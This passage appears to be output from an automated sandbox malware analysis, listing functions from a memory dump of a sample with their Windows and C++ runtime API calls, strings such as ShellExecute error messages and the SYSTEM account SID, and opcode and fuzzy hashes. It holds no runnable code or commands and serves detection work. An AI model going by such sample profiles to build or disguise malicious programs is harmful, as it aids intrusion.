• Opcode ID: 96dffa4329a7ab589dde7362493a56d656c77c430611ee2bec1e980e57379617
• Instruction ID: 5839053d234c6e6969c71aa75476bb97f42d6d3b25b3377a9f9244560d1e95e9
• Opcode Fuzzy Hash: 96dffa4329a7ab589dde7362493a56d656c77c430611ee2bec1e980e57379617
• Instruction Fuzzy Hash: 00018C36910229DBCB15FB649852ABEB7F1FF84720F380589E5186B292DF749E408B91
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 00B3EB33
• std::_Lockit::_Lockit.LIBCPMT ref: 00B3EB3D
  • Part of subcall function 00B28C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B28C50
  • Part of subcall function 00B28C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B28C78
• moneypunct.LIBCPMT ref: 00B3EB77
• std::_Facet_Register.LIBCPMT ref: 00B3EB8E
• std::_Lockit::~_Lockit.LIBCPMT ref: 00B3EBAE
Memory Dump Source
• Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
• Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
• String ID:
• API String ID: 419941038-0
• Opcode ID: 9e1e78b14d110259780a605a35a70d371dfe0fd5d69ab33df5295921e043275d
• Instruction ID: 21d5e81dda29a3ee224dd0a49d3557bde54eb441398736e78d80ed1db611cf8a
• Opcode Fuzzy Hash: 9e1e78b14d110259780a605a35a70d371dfe0fd5d69ab33df5295921e043275d
• Instruction Fuzzy Hash: A301C036910129DFCB15EB64D8916BEB7F0FF84710F24058AE4296B2D1DF74DE008B91
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 00B32D7B
• std::_Lockit::_Lockit.LIBCPMT ref: 00B32D85
  • Part of subcall function 00B28C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B28C50
  • Part of subcall function 00B28C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B28C78
• numpunct.LIBCPMT ref: 00B32DBF
• std::_Facet_Register.LIBCPMT ref: 00B32DD6
• std::_Lockit::~_Lockit.LIBCPMT ref: 00B32DF6
Memory Dump Source
• Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
• Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registernumpunct
• String ID:
• API String ID: 743221004-0
• Opcode ID: e02b7d772df067024a067d63a3217188e4e01c8c6ede35fdc8b658db5d579a28
• Instruction ID: f65a984fd1d11fb9aea71889b13e30c077fe0a662f8a2ac34008b86892b88fa0
• Opcode Fuzzy Hash: e02b7d772df067024a067d63a3217188e4e01c8c6ede35fdc8b658db5d579a28
• Instruction Fuzzy Hash: 2201C0369002299BCB05FBA4D8116BEB7F0FF84720F380499E4186B291CF749E018B91
Uniqueness
Uniqueness Score: -1.00%

APIs
• EnterCriticalSection.KERNEL32(00B7DD3C,?,?,00B22427,00B7E638,00B66B40), ref: 00B42C58
• LeaveCriticalSection.KERNEL32(00B7DD3C,?,?,00B22427,00B7E638,00B66B40), ref: 00B42C8B
• RtlWakeAllConditionVariable.NTDLL ref: 00B42D02
• SetEvent.KERNEL32(?,00B22427,00B7E638,00B66B40), ref: 00B42D0C
• ResetEvent.KERNEL32(?,00B22427,00B7E638,00B66B40), ref: 00B42D18
Memory Dump Source
• Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
• Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
Similarity
• API ID: CriticalEventSection$ConditionEnterLeaveResetVariableWake
• String ID:
• API String ID: 3916383385-0
• Opcode ID: 96d59f8b3365c8f4eb819b7e4bbd0c3aed68c40cf2d5a3ee9afad4f87a2c16e2
• Instruction ID: 40326a09ec53303258c84c25ae720c223101d3235723e09da34a04bd94a0918a
• Opcode Fuzzy Hash: 96d59f8b3365c8f4eb819b7e4bbd0c3aed68c40cf2d5a3ee9afad4f87a2c16e2
• Instruction Fuzzy Hash: EB014631A04120DFC725AF18FC48A987BB5FF4978570004AAF80A93370CF741981DBA0
Uniqueness
Uniqueness Score: -1.00%

APIs
• LocalAlloc.KERNEL32(00000040,00000018,823FDEC6,?,00000000), ref: 00B2BBA3
• Concurrency::cancel_current_task.LIBCPMT ref: 00B2BD7F
Strings
Memory Dump Source
• Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
• Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
Similarity
• API ID: AllocConcurrency::cancel_current_taskLocal
• String ID: false$true
• API String ID: 3924972193-2658103896
• Opcode ID: 2ce9a807083158e5e3b05d7ecb2aedf431a041f0044fcea581103ba64020bc32
• Instruction ID: ca5062e178174bac8caf5fd8cbcf45cdcd7f58e30a8154cf90de5857688c9cdf
• Opcode Fuzzy Hash: 2ce9a807083158e5e3b05d7ecb2aedf431a041f0044fcea581103ba64020bc32
• Instruction Fuzzy Hash: 3161A6B1D00758DBDB10CFA4C841BDEB7F8FF14704F1446AAE859AB281EB75AA44CB91
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 00B3D3D2
  • Part of subcall function 00B3254E: __EH_prolog3.LIBCMT ref: 00B32555
  • Part of subcall function 00B3254E: std::_Lockit::_Lockit.LIBCPMT ref: 00B3255F
  • Part of subcall function 00B3254E: std::_Lockit::~_Lockit.LIBCPMT ref: 00B325D0
• _Find_elem.LIBCPMT ref: 00B3D46E
Strings
Memory Dump Source
• Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
• Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
Similarity
• API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
• String ID: %.0Lf$0123456789-
• API String ID: 2544715827-3094241602
• Opcode ID: a59672e8678a8c1365770684f61f873a0e10843953208a0a12d91db4e766369f
• Instruction ID: c3a60be9f6f17c301644aa0830fdc50e15c167754f2fa587d41fbac1f827fb53
• Opcode Fuzzy Hash: a59672e8678a8c1365770684f61f873a0e10843953208a0a12d91db4e766369f
• Instruction Fuzzy Hash: BC417E31A00218DFCF15DFA8D880ADEBBF5FF18314F200199E815AB255DB70EA56CBA1
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 00B3D676
  • Part of subcall function 00B28610: std::_Lockit::_Lockit.LIBCPMT ref: 00B28657
  • Part of subcall function 00B28610: std::_Lockit::_Lockit.LIBCPMT ref: 00B28679
  • Part of subcall function 00B28610: std::_Lockit::~_Lockit.LIBCPMT ref: 00B286A1
  • Part of subcall function 00B28610: std::_Lockit::~_Lockit.LIBCPMT ref: 00B2880E
• _Find_elem.LIBCPMT ref: 00B3D712
Strings
Memory Dump Source
• Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
• Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
Similarity
• API ID: Lockitstd::_$Lockit::_Lockit::~_$Find_elemH_prolog3_
• String ID: 0123456789-$0123456789-
• API String ID: 3042121994-2494171821
• Opcode ID: 92ff8a4fdb2f62653de8a0faddac667433df35d4780061753990972d6543c444
• Instruction ID: db5bdd94afe535e91c81056b9b1819e82624ce0046ece16bf4e5ba57b7cb684b
• Opcode Fuzzy Hash: 92ff8a4fdb2f62653de8a0faddac667433df35d4780061753990972d6543c444
• Instruction Fuzzy Hash: A1415D71900218DFCF15EFA8E8819DEBBF9FF18314F200199E815AB255DB70EA56CB91
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 00B41761
  • Part of subcall function 00B29270: std::_Lockit::_Lockit.LIBCPMT ref: 00B292A0
  • Part of subcall function 00B29270: std::_Lockit::_Lockit.LIBCPMT ref: 00B292C2
  • Part of subcall function 00B29270: std::_Lockit::~_Lockit.LIBCPMT ref: 00B292EA
  • Part of subcall function 00B29270: std::_Lockit::~_Lockit.LIBCPMT ref: 00B29422
• _Find_elem.LIBCPMT ref: 00B417FB
Strings
Memory Dump Source
• Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
• Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
Similarity
• API ID: Lockitstd::_$Lockit::_Lockit::~_$Find_elemH_prolog3_
• String ID: 0123456789-$0123456789-
• API String ID: 3042121994-2494171821
• Opcode ID: 9f5c97a8960a3efa31ad650812cc9dd4fcf259ac2e928eaaf2e29a82ef23ae53
• Instruction ID: 3b2957de00225868d6181c6d8fd252deb945b376bbe32c94fcd0bac3987ab6fb
• Opcode Fuzzy Hash: 9f5c97a8960a3efa31ad650812cc9dd4fcf259ac2e928eaaf2e29a82ef23ae53
• Instruction Fuzzy Hash: 46417C71D00218EFCF05EFA8D881A9EBBF5FF14314F10059AE815AB252DB74DA42DB91
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 00B3838D
  • Part of subcall function 00B31C42: _Maklocstr.LIBCPMT ref: 00B31C62
  • Part of subcall function 00B31C42: _Maklocstr.LIBCPMT ref: 00B31C7F
  • Part of subcall function 00B31C42: _Maklocstr.LIBCPMT ref: 00B31C9C
  • Part of subcall function 00B31C42: _Maklocchr.LIBCPMT ref: 00B31CAE
  • Part of subcall function 00B31C42: _Maklocchr.LIBCPMT ref: 00B31CC1
• _Mpunct.LIBCPMT ref: 00B3841A
• _Mpunct.LIBCPMT ref: 00B38434
Strings
Memory Dump Source
• Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
• Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
Similarity
• API ID: Maklocstr$MaklocchrMpunct$H_prolog3
• String ID: $+xv
• API String ID: 2939335142-1686923651
• Opcode ID: 1138f34b9e421bff5f53588317ce1b804d9eb690a079379819603cd2d23cdc05
• Instruction ID: bfabba402b7636a61ef8c3917ac42dc5c1631b7eaf3c1296d1b09916c1c3f277
• Opcode Fuzzy Hash: 1138f34b9e421bff5f53588317ce1b804d9eb690a079379819603cd2d23cdc05
• Instruction Fuzzy Hash: 5F21C4B1804B926ED725DF79C48073BBEF8AB08700F140A9AF459C7A42D774E601CB90
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
• Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
Similarity
• API ID: Mpunct$H_prolog3
• String ID: $+xv
• API String ID: 4281374311-1686923651
• Opcode ID: f78f95769a418a8861bfdec67375334060b9c97175a6065991481a3a7039f25c
• Instruction ID: 0944b40613661c9a9537b371a9b08be1d7da9466b49c8adcad15b0ffc642138f
• Opcode Fuzzy Hash: f78f95769a418a8861bfdec67375334060b9c97175a6065991481a3a7039f25c
• Instruction Fuzzy Hash: 0E21C4B1904B556ED721EF74849073BBEF8AB08300F144A9AE499C7A42D374E701CB90
Uniqueness
Uniqueness Score: -1.00%

APIs
• LocalAlloc.KERNEL32(00000040,?,?,?,?,?,00B21434,?,00000000), ref: 00B22569
• LocalAlloc.KERNEL32(00000040,?,?,?,?,?,00B21434,?,00000000), ref: 00B22589
• LocalFree.KERNEL32(?,00B21434,?,00000000), ref: 00B225DF
• CloseHandle.KERNEL32(00000000,823FDEC6,?,00000000,00B63C40,000000FF,00000008,?,?,?,?,00B21434,?,00000000), ref: 00B22633
• LocalFree.KERNEL32(?,823FDEC6,?,00000000,00B63C40,000000FF,00000008,?,?,?,?,00B21434), ref: 00B22647
Memory Dump Source
• Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
• Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
Similarity
• API ID: Local$AllocFree$CloseHandle
• String ID:
• API String ID: 1291444452-0
• Opcode ID: f03ac0fd51501bca2ae19ac14e6c44bf631d98bbf5d9124bb8042f0cb41e8bb3
• Instruction ID: a012d7ef32a584fd7849c4c9ba07c96a04692f093ca5e8f0244360ab7900d055
• Opcode Fuzzy Hash: f03ac0fd51501bca2ae19ac14e6c44bf631d98bbf5d9124bb8042f0cb41e8bb3
• Instruction Fuzzy Hash: 64410C72600321BBC7149F38E894B5AB7D8EF59360F1047AAF92AC76E0DB74DD4487A0
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetConsoleOutputCP.KERNEL32(823FDEC6,?,00000000,?), ref: 00B61DFE
  • Part of subcall function 00B5A9BB: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00B56F5E,?,00000000,-00000008), ref: 00B5AA67
• WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00B62059
• WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00B620A1
• GetLastError.KERNEL32 ref: 00B62144
Memory Dump Source
• Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
• Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
Similarity
• API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
• String ID:
• API String ID: 2112829910-0
• Opcode ID: 3f25242d09a6794c785daef7865edbe6273cf640f8a0e34f902dedcde5e145b3
• Instruction ID: 1c489e2b42ce87b29811648c839ff73c42177c49362c1b52d6def1c081f663f3
• Opcode Fuzzy Hash: 3f25242d09a6794c785daef7865edbe6273cf640f8a0e34f902dedcde5e145b3
• Instruction Fuzzy Hash: EED187B5D046489FDF05CFA8D880AADBBF8FF09304F1845AAE929EB351D734A945CB50
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
• Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
Similarity
• API ID: _strcspn$H_prolog3_ctype
• String ID:
• API String ID: 838279627-0
• Opcode ID: 4c1fbeae65817869df80e11c941db82685616cceebe520a13d113ca8ec6ecd3e
• Instruction ID: 1214dfed66c15f28a951106bb910923251dac14ae0f10928af617b669dec7f75
• Opcode Fuzzy Hash: 4c1fbeae65817869df80e11c941db82685616cceebe520a13d113ca8ec6ecd3e
• Instruction Fuzzy Hash: 68B15CB5900249EFDF11DF98C881AEEBBF9FF48710F244199E805AB251D730AE55CB60
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
• Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
Similarity
• API ID: _strcspn$H_prolog3_ctype
• String ID:
• API String ID: 838279627-0
• Opcode ID: 85f1776d1861aeb38400bfecc0900ba3f6e311584490891d65bf7b6ddd347877
• Instruction ID: 1441dd68ad6f8e5c3566b7e9f82a1b5bfe648c9737080a735daa36d3ce87622e
• Opcode Fuzzy Hash: 85f1776d1861aeb38400bfecc0900ba3f6e311584490891d65bf7b6ddd347877
• Instruction Fuzzy Hash: 57B15B71D00269DFDF10DF94D881AEEBBF9EF08300F144599E819AB216D770AE46CB60
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
• Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
Similarity
• API ID: AdjustPointer
• String ID:
• API String ID: 1740715915-0
• Opcode ID: a82635dd216bcca0a63521ef913df801b832d66d79bd241db78bf2c2731b61bf
• Instruction ID: a5cd9229b28609456bbaf0e787265b4a36fe1c13652c041313b97bb21e4ea0c5
• Opcode Fuzzy Hash: a82635dd216bcca0a63521ef913df801b832d66d79bd241db78bf2c2731b61bf
• Instruction Fuzzy Hash: 1051D372600F069FDB398F54D891B6A77F4EF44310F1445A9E805972A2E731EE50E790
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
• Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 076138f108973fc3d2a7fc617e017dba191e8c24d82edbe6be596319ba2f0916
• Instruction ID: 81bbec1f346dff6c8f09a1e1972429d0580ccc8693de490af490c3da31fcb010
• Opcode Fuzzy Hash: 076138f108973fc3d2a7fc617e017dba191e8c24d82edbe6be596319ba2f0916
• Instruction Fuzzy Hash: C521CF31605205AFEB21AF60ECA1E2A77E9FF6636670089D6FC1597150EB30ED089760
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32(?,?,00000002,80004005,S-1-5-18,00000008), ref: 00B26FB7
Strings
Memory Dump Source
• Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
• Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
Similarity
• API ID: ErrorLast
• String ID: > returned:$Call to ShellExecute() for verb<$Last error=
• API String ID: 1452528299-1781106413
• Opcode ID: 85d50588a12083377005747459f1ffb8e482a999068d96e9482c96aae4cfd4ed
• Instruction ID: d9d5e62d86d3a74beb26eeb0f69f3f37798e984d98df6800bb27fe5a692af24d
• Opcode Fuzzy Hash: 85d50588a12083377005747459f1ffb8e482a999068d96e9482c96aae4cfd4ed
• Instruction Fuzzy Hash: 21219F59A1027182CB301F28A41173AA2E0EF54758F6548AFE8CDD7390EEA98C828399
Uniqueness
Uniqueness Score: -1.00%

APIs
• CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000004,00000080,00000000,823FDEC6), ref: 00B2CD1C
• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00B2CD3C
• WriteFile.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00B2CD6D
• CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00B2CD86
Memory Dump Source
• Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
• Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
Similarity
• API ID: File$CloseCreateHandlePointerWrite
• String ID:
• API String ID: 3604237281-0
• Opcode ID: 0294664830a81d03fdfd3d27a187773a09fa540e5df61fa10869a4b0ed7349ab
• Instruction ID: ea7a7c6d19c0db72f4e6a585e0913ae9163d3791f8589c6981878df6594cf07b
• Opcode Fuzzy Hash: 0294664830a81d03fdfd3d27a187773a09fa540e5df61fa10869a4b0ed7349ab
• Instruction Fuzzy Hash: F221B171941315ABD7218F54DD09FAEBBF8EB05B14F104269F518B72D0DBB46A0487E4
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 00B327A9
• std::_Lockit::_Lockit.LIBCPMT ref: 00B327B3
  • Part of subcall function 00B28C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B28C50
  • Part of subcall function 00B28C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B28C78
• std::_Facet_Register.LIBCPMT ref: 00B32804
• std::_Lockit::~_Lockit.LIBCPMT ref: 00B32824
Memory Dump Source
• Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
• Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
• String ID:
• API String ID: 2854358121-0
• Opcode ID: 4ace659dcaef62c1119dbd9e3dea1a7464063f61f028b53c8dcfe64bf3b7b2e1
• Instruction ID: fee3f8d8d078c06764cfb66a56bac11f0d022d4df27c1376d3ecd883fbfa4255
• Opcode Fuzzy Hash: 4ace659dcaef62c1119dbd9e3dea1a7464063f61f028b53c8dcfe64bf3b7b2e1
• Instruction Fuzzy Hash: CC018035900229DBCB15EBA498516BE77F1FF84B20F380589E9196B292DF749E018791
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 00B2D7EE
• std::_Lockit::_Lockit.LIBCPMT ref: 00B2D7F8
  • Part of subcall function 00B28C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B28C50
  • Part of subcall function 00B28C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B28C78
• std::_Facet_Register.LIBCPMT ref: 00B2D849
• std::_Lockit::~_Lockit.LIBCPMT ref: 00B2D869
Memory Dump Source
• Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
• Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
• String ID:
• API String ID: 2854358121-0
• Opcode ID: 9b256585575e0e803334890fb2450e5d6fbb0bce955c1891269d76d0069993e7
• Instruction ID: 87e50708c9215b100efad3ad172fee9ba389de8bbd4be6ae79898665d7b9e6a7
